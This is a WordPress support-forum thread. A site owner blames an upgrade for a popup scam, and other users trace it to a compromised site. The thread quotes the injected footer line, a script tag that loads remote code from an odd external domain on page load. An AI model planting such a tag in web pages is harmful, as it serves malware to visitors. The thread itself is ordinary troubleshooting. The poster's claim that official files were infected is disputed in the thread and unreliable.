I just upgraded WP on one of my blogs manually and it's installed a popup scam security ad on my blog! Please go to creditcardforum dot com /blog in Internet Explorer to see (doesn't do it in Firefox). Please help. How do I get rid of this?!
[closed] URGENT HELP! WP upgrade installed spam! (9 posts)
-
creditcardforum
Posted 2 years ago # -
Posted 2 years ago #</div> <!-- Footer div --> </div> <!-- Wrapper div --> <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script> </body> </html>That's what's in your footer! index.php, page.php, etc. are all infected with malicious code... I DOWNLOADED 2.9.2 DIRECTLY FROM WORDPRESS.ORG! Someone needs to stop this!
-
Posted 2 years ago #Anyone home? This is urgent... I'm not talking about myself, but rather everyone else that is downloading these infected files from wordpress.org! I just restored my DB and files to pre-update. I'm going through the files downloaded from WordPress and these are so infected it's not even funny. Someone needs to pull the 2.9.2 corrupt files ASAP I can't even imagine how many people are being affected by this and probably don't even know it.
-
I just downloaded 2.9.2 and looked in index.php and page.php and did not see anything to match your code, my index file only has two real lines of code.
-
I just looked through the source of the index.php and page.php files from the Default and Classic themes and the main index.php file from WordPress 2.9.2. I see absolutely no reference to any sort or malware or the script tag that you posted. Are your sure the malware is not in your own theme or perhaps being added by a plugin?
-
Looking a some earlier threads, I bet your blog is either hosted with GoDaddy or subject to the same vulnerability. See these for more info:
-
songdogtech
Posted 2 years ago #@creditcardforum: Google that URL string and read the hack reports. You on Network Solutions? :
http://blog.sucuri.net/2010/05/second-round-of-godaddy-sites-hacked.html
and
http://blog.sucuri.net/2010/05/new-infections-today-at-network.html
-
ClaytonJames
Posted 2 years ago #@creditcardforum
Your source code says you are currently using WordPress 2.6.
<meta name="generator" content="WordPress 2.6" />I also noted you are running a potentially vulnerable version of vBulletin at your domain root.
<meta name="generator" content="vBulletin 3.6.11" />I think I read somewhere quite a while back about some serious XXS vulnerabilities in version 3.6.11 ( if left un-patched ).
Just some food for thought while analyzing how you may have gotten hacked.
[edit] and I see you are indeed hosted by GoDaddy.
-
closing this hysterical thread as bunk - posted twice, anyway
Topic Closed
This topic has been closed to new replies.
